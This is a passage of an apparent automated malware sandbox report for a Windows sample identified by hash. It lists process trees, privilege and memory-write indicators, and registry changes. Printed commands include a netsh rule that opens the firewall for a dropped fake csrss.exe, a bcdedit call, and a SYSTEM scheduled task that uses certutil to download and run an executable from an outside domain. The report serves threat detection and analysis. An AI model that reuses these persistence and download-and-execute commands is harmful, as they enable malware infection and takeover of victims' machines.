bd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	csrss.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exee277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.execsrss.exe

pid	process
2864	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
2864	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
2764	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
2764	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
2704	csrss.exe
2704	csrss.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exesvchost.execsrss.exe

description	pid	process
Token: SeDebugPrivilege	2864	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Token: SeImpersonatePrivilege	2864	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Token: SeTcbPrivilege	852	svchost.exe
Token: SeTcbPrivilege	852	svchost.exe
Token: SeBackupPrivilege	852	svchost.exe
Token: SeRestorePrivilege	852	svchost.exe
Token: SeBackupPrivilege	852	svchost.exe
Token: SeRestorePrivilege	852	svchost.exe
Token: SeBackupPrivilege	852	svchost.exe
Token: SeRestorePrivilege	852	svchost.exe
Token: SeBackupPrivilege	852	svchost.exe
Token: SeRestorePrivilege	852	svchost.exe
Token: SeSystemEnvironmentPrivilege	2704	csrss.exe
Token: SeBackupPrivilege	852	svchost.exe
Token: SeRestorePrivilege	852	svchost.exe
Token: SeBackupPrivilege	852	svchost.exe
Token: SeRestorePrivilege	852	svchost.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

svchost.exee277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.execmd.execsrss.exe

description	pid	process	target process
PID 852 wrote to memory of 2764	852	svchost.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
PID 852 wrote to memory of 2764	852	svchost.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
PID 852 wrote to memory of 2764	852	svchost.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
PID 2764 wrote to memory of 4596	2764	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe	cmd.exe
PID 2764 wrote to memory of 4596	2764	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe	cmd.exe
PID 4596 wrote to memory of 4300	4596	cmd.exe	netsh.exe
PID 4596 wrote to memory of 4300	4596	cmd.exe	netsh.exe
PID 2764 wrote to memory of 2704	2764	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe	csrss.exe
PID 2764 wrote to memory of 2704	2764	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe	csrss.exe
PID 2764 wrote to memory of 2704	2764	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe	csrss.exe
PID 852 wrote to memory of 3972	852	svchost.exe	schtasks.exe
PID 852 wrote to memory of 3972	852	svchost.exe	schtasks.exe
PID 852 wrote to memory of 2596	852	svchost.exe	schtasks.exe
PID 852 wrote to memory of 2596	852	svchost.exe	schtasks.exe
PID 852 wrote to memory of 4992	852	svchost.exe	patch.exe
PID 852 wrote to memory of 4992	852	svchost.exe	patch.exe
PID 2704 wrote to memory of 4852	2704	csrss.exe	bcdedit.exe
PID 2704 wrote to memory of 4852	2704	csrss.exe	bcdedit.exe

C:\Users\Admin\AppData\Local\Temp\e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
"C:\Users\Admin\AppData\Local\Temp\e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 328
2⤵
- Program crash
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 332
2⤵
- Program crash
PID:2300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 356
2⤵
- Program crash
PID:3400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 612
2⤵
- Program crash
PID:4376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 700
2⤵
- Program crash
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 700
2⤵
- Program crash
PID:3324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 728
2⤵
- Program crash
PID:3460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 736
2⤵
- Program crash
PID:3724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 752
2⤵
- Program crash
PID:4012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 784
2⤵
- Program crash
PID:2652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 864
2⤵
- Program crash
PID:1224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 804
2⤵
- Program crash
PID:2148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 628
2⤵
- Program crash
PID:1068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 788
2⤵
- Program crash
PID:884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 924
2⤵
- Program crash
PID:3024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 908
2⤵
- Program crash
PID:3028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 712
2⤵
- Program crash
PID:4224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 872
2⤵
- Program crash
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 784
2⤵
- Program crash
PID:3404

C:\Users\Admin\AppData\Local\Temp\e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
"C:\Users\Admin\AppData\Local\Temp\e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe"
2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 292
3⤵
- Program crash
PID:2788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 296
3⤵
- Program crash
PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 316
3⤵
- Program crash
PID:3224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 576
3⤵
- Program crash
PID:4172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 668
3⤵
- Program crash
PID:2924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 688
3⤵
- Program crash
PID:4968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 688
3⤵
- Program crash
PID:4628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 684
3⤵
- Program crash
PID:2768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 724
3⤵
- Program crash
PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 692
3⤵
- Program crash
PID:3860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 840
3⤵
- Program crash
PID:4384

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:4596

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies Windows Firewall
PID:4300

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 328
4⤵
- Program crash
PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 332
4⤵
- Program crash
PID:1736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 332
4⤵
- Program crash
PID:3672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 664
4⤵
- Program crash
PID:3168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 664
4⤵
- Program crash
PID:4544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 664
4⤵
- Program crash
PID:1596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 732
4⤵
- Program crash
PID:3912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 740
4⤵
- Program crash
PID:4188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 760
4⤵
- Program crash
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 812
4⤵
- Program crash
PID:2740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 892
4⤵
- Program crash
PID:1608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 868
4⤵
- Program crash
PID:1508

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:2596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 904
4⤵
- Program crash
PID:3252

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:3972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 980
4⤵
- Program crash
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 996
4⤵
- Program crash
PID:1068

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
- Executes dropped EXE
PID:4992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1068
4⤵
- Program crash
PID:1732

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:4852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1064
4⤵
- Program crash
PID:3192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1504
4⤵
- Program crash
PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1496
4⤵
- Program crash
PID:1296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1576
4⤵
- Program crash
PID:4172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 972
4⤵
- Program crash
PID:3020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1528
4⤵
- Program crash
PID:3412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1560
4⤵
- Program crash
PID:1980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1628
4⤵
- Program crash
PID:2304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1484
4⤵
- Program crash
PID:420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1632
4⤵
- Program crash
PID:1984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1560
4⤵
- Program crash
PID:2400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 456
4⤵
- Program crash
PID:3036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1552
4⤵
- Program crash
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1700
4⤵
- Program crash
PID:3980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1884
4⤵
- Program crash
PID:4188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1884
4⤵
- Program crash
PID:3636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1040
4⤵
PID:4764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1712
4⤵
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 748
3⤵
- Program crash
PID:2420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 920
2⤵
- Program crash
PID:2244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2864 -ip 2864
1⤵
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2864 -ip 2864
1⤵
PID:648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2864 -ip 2864
1⤵
PID:4248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2864 -ip 2864
1⤵
PID:4360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2864 -ip 2864
1⤵
PID:2128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2864 -ip 2864
1⤵
PID:1364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2864 -ip 2864
1⤵
PID:3512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2864 -ip 2864
1⤵
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2864 -ip 2864
1⤵
PID:204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2864 -ip 2864
1⤵
PID:856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2864 -ip 2864
1⤵
PID:1164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2864 -ip 2864
1⤵
PID:4604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2864 -ip 2864
1⤵
PID:3180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2864 -ip 2864
1⤵
PID:3244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2864 -ip 2864
1⤵
PID:3916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2864 -ip 2864
1⤵
PID:560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2864 -ip 2864
1⤵
PID:3128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2864 -ip 2864
1⤵
PID:1100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2864 -ip 2864
1⤵
PID:5092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2864 -ip 2864
1⤵
PID:2132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2764 -ip 2764
1⤵
PID:1820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2764 -ip 2764
1⤵
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2764 -ip 2764
1⤵
PID:4252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2764 -ip 2764
1⤵
PID:4932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2764 -ip 2764
1⤵
PID:1372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2764 -ip 2764
1⤵
PID:3152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2764 -ip 2764
1⤵
PID:2348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2764 -ip 2764
1⤵
PID:2344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2764 -ip 2764
1⤵
PID:1036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2764 -ip 2764
1⤵
PID:4140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2764 -ip 2764
1⤵
PID:2528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2764 -ip 2764
1⤵
PID:1824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2704 -ip 2704
1⤵
PID:1804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2704 -ip 2704
1⤵
PID:3044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2704 -ip 2704
1⤵
PID:3684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2704 -ip 2704
1⤵
PID:2524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2704 -ip 2704
1⤵
PID:3120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2704 -ip 2704
1⤵
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2704 -ip 2704
1⤵
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2704 -ip 2704
1⤵
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2704 -ip 2704
1⤵
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2704 -ip 2704
1⤵
PID:508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2704 -ip 2704
1⤵
PID:3700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2704 -ip 2704
1⤵
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2704 -ip 2704
1⤵
PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2704 -ip 2704
1⤵
PID:1344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2704 -ip 2704
1⤵
PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2704 -ip 2704
1⤵
PID:1496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2704 -ip 2704
1⤵
PID:3128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2704 -ip 2704
1⤵
PID:2168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2704 -ip 2704
1⤵
PID:2468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2704 -ip 2704
1⤵
PID:4932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2704 -ip 2704
1⤵
PID:1372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2704 -ip 2704
1⤵
PID:3948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2704 -ip 2704
1⤵
PID:4984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2704 -ip 2704
1⤵
PID:4504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2704 -ip 2704
1⤵
PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2704 -ip 2704
1⤵
PID:1932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2704 -ip 2704
1⤵
PID:2860

C:\Windows\SysWOW64\WerFault.exe
